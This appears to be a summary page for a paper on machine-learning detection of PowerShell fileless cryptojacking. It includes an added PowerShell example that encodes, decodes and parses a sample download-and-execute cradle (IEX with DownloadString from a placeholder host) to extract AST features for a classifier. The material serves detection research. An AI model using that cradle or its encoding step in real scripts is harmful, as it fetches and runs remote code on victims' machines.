Detecting PowerShell-based Fileless Cryptojacking Attacks Using Machine Learning

Said Varlioglu, Nelly Elsayed, Murat Ozer, Zag ElSayed, John M. Emmert

TL;DR

Results showed that Abstract Syntax Tree (AST)-based fine-tuned CodeBERT achieved a high recall rate, demonstrating the value of AST integration and of fine-tuning pre-trained programming-language models for this task.

Abstract

With the emergence of remote code execution (RCE) vulnerabilities in ubiquitous libraries and of advanced social engineering techniques, threat actors have started conducting widespread fileless cryptojacking attacks. These attacks have become effective through stealthy techniques based on PowerShell exploitation in Windows environments. Even if an attack is detected and the malicious script removed, the processes it spawned may remain running on the victim endpoint, which poses a significant challenge for detection mechanisms. In this paper, we conducted an experimental study on a collected dataset of PowerShell-based fileless cryptojacking scripts. The results showed that Abstract Syntax Tree (AST)-based fine-tuned CodeBERT achieved a high recall rate, demonstrating the value of AST integration and of fine-tuning pre-trained programming-language models for this task.
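The abstract's detection pipeline starts from a script's AST rather than its raw text. The block below is an added example, not code from the paper or its dataset: it takes a constructed encoded-command payload of the kind the paper's Figure 1 shows, decodes it the way PowerShell does for `-EncodedCommand` (base64 over UTF-16LE), parses it with the built-in `System.Management.Automation.Language.Parser` without executing anything, and emits the node-type sequence and command names that an AST-based classifier would consume. The script text and the `example.invalid` URL are constructed for illustration; nothing is downloaded.

```powershell
# Added example (not from the paper). Converts a PowerShell payload into an
# AST node-type sequence suitable as input to an AST-based classifier.

# 1. Constructed sample payload (hypothetical; .invalid is a reserved TLD, so
#    the URL cannot resolve). It is only parsed, never run.
$plain = 'IEX (New-Object Net.WebClient).DownloadString("http://example.invalid/m.ps1")'

# Build the encoded form an attacker would pass to powershell.exe -EncodedCommand.
$encoded = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($plain))

# 2. Decode exactly as PowerShell does: base64 wrapping UTF-16LE text.
$decoded = [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($encoded))

# 3. Parse into an AST. ParseInput only builds the tree; it does not execute.
$tokens = $null
$errors = $null
$ast = [System.Management.Automation.Language.Parser]::ParseInput(
    $decoded, [ref]$tokens, [ref]$errors)
if ($errors.Count -gt 0) {
    throw "Parse errors: $(($errors | ForEach-Object { $_.Message }) -join '; ')"
}

# 4. Depth-first walk over every node, keeping only the node type name.
#    String literals and identifiers are dropped, so renaming a variable or
#    swapping the URL does not change this feature sequence.
$nodeTypes = $ast.FindAll({ $true }, $true) | ForEach-Object { $_.GetType().Name }

# 5. Command names are a second structural feature: here IEX and New-Object.
$commands = $ast.FindAll(
    { $args[0] -is [System.Management.Automation.Language.CommandAst] }, $true) |
    ForEach-Object { $_.GetCommandName() }

# Emit both as space-separated token streams for a code model's tokenizer.
"NODE_TYPES: " + ($nodeTypes -join ' ')
"COMMANDS:   " + ($commands -join ' ')
```

One caveat a practitioner should keep in mind: the parser only sees the outermost layer. A payload that builds its real script as a string and hands it to `Invoke-Expression` yields an AST dominated by string and concatenation nodes, so the inner script's structure is invisible until that string is unwrapped (statically or by script block logging at run time) and parsed again.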

Paper Structure (26 sections, 1 equation, 5 figures, 4 tables)

Figures (5)

  • Figure 1: Sample encoded PowerShell-based fileless cryptojacking script.
  • Figure 2: Sample PowerShell-based fileless cryptojacking attacks workflow.
  • Figure 3: Sample AST of a Ping command: "ping -c 4 -t 64 uc.edu".
  • Figure 4: The LSTM architecture diagram [elsayed2023litelstm].
  • Figure 5: BiLSTM model training and validation loss and accuracy results.